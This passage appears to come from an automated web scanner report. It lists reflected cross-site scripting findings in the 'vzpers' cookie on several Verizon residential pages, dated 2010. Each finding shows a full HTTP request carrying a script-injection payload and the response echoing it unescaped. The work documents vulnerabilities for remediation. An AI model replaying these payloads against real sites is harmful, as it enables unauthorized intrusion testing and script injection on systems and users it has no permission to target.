Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiosinternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXb1264'><script>alert(1)</script>165f1efa5f2; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117637
Expires: Mon, 13 Dec 2010 01:00:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:00:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB1264'><SCRIPT>ALERT(1)</SCRIPT>165F1EFA5F2 ' />
...[SNIP]...

1.166. http://www22.verizon.com/residential/fiosinternet [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiosinternet

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload ee54a<script>alert(1)</script>e4ab8442bc3 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiosinternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXee54a<script>alert(1)</script>e4ab8442bc3; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119175
Expires: Mon, 13 Dec 2010 01:00:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:00:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:07 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXEE54A<SCRIPT>ALERT(1)</SCRIPT>E4AB8442BC3 </DIV>
...[SNIP]...

1.167. http://www22.verizon.com/residential/fiosinternet/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiosinternet/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25652'><script>alert(1)</script>11fe0b963dc was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiosinternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX25652'><script>alert(1)</script>11fe0b963dc; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119185
Expires: Mon, 13 Dec 2010 00:54:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:54:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:54:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:41 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX25652'><SCRIPT>ALERT(1)</SCRIPT>11FE0B963DC ' />
...[SNIP]...

1.168. http://www22.verizon.com/residential/fiosinternet/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiosinternet/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 34f2e<script>alert(1)</script>d474caeeb0f was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiosinternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX34f2e<script>alert(1)</script>d474caeeb0f; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119181
Expires: Mon, 13 Dec 2010 00:54:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:54:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:54:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:54:45 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX34F2E<SCRIPT>ALERT(1)</SCRIPT>D474CAEEB0F </DIV>
...[SNIP]...

1.169. http://www22.verizon.com/residential/fiostv [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiostv

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 9241e<script>alert(1)</script>98da35b9ed5 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiostv HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX9241e<script>alert(1)</script>98da35b9ed5; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 109175
Expires: Mon, 13 Dec 2010 01:00:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:00:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:09 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9241E<SCRIPT>ALERT(1)</SCRIPT>98DA35B9ED5 </DIV>
...[SNIP]...

1.170. http://www22.verizon.com/residential/fiostv [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiostv

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload acabb'><script>alert(1)</script>a2ede854ce2 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiostv HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXacabb'><script>alert(1)</script>a2ede854ce2; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 109179
Expires: Mon, 13 Dec 2010 01:00:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:00:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:07 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXACABB'><SCRIPT>ALERT(1)</SCRIPT>A2EDE854CE2 ' />
...[SNIP]...

1.171. http://www22.verizon.com/residential/highspeedinternet/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/highspeedinternet/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 82d3e'><script>alert(1)</script>64d490109fc was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/highspeedinternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX82d3e'><script>alert(1)</script>64d490109fc; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 185075
Expires: Mon, 13 Dec 2010 00:56:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:07 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:07 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:07 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="https://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compati
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX82D3E'><SCRIPT>ALERT(1)</SCRIPT>64D490109FC ' />
...[SNIP]...

1.172. http://www22.verizon.com/residential/highspeedinternet/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/highspeedinternet/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 547a1<script>alert(1)</script>fd62b4de3b4 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/highspeedinternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX547a1<script>alert(1)</script>fd62b4de3b4; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 185059
Expires: Mon, 13 Dec 2010 00:56:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:09 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:09 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="https://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compati
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX547A1<SCRIPT>ALERT(1)</SCRIPT>FD62B4DE3B4 </DIV>
...[SNIP]...

1.173. http://www22.verizon.com/residential/homephone [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/homephone

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload ba1d0<script>alert(1)</script>af14559c597 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/homephone HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXba1d0<script>alert(1)</script>af14559c597; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 61470
Expires: Mon, 13 Dec 2010 01:00:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:32 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:00:32 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:32 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:32 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXBA1D0<SCRIPT>ALERT(1)</SCRIPT>AF14559C597 </DIV>
...[SNIP]...

1.174. http://www22.verizon.com/residential/homephone [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/homephone

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb562'><script>alert(1)</script>82a1c55dd60 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/homephone HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXeb562'><script>alert(1)</script>82a1c55dd60; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 59968
Expires: Mon, 13 Dec 2010 01:00:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:00:31 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:31 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:31 GMT; path=/

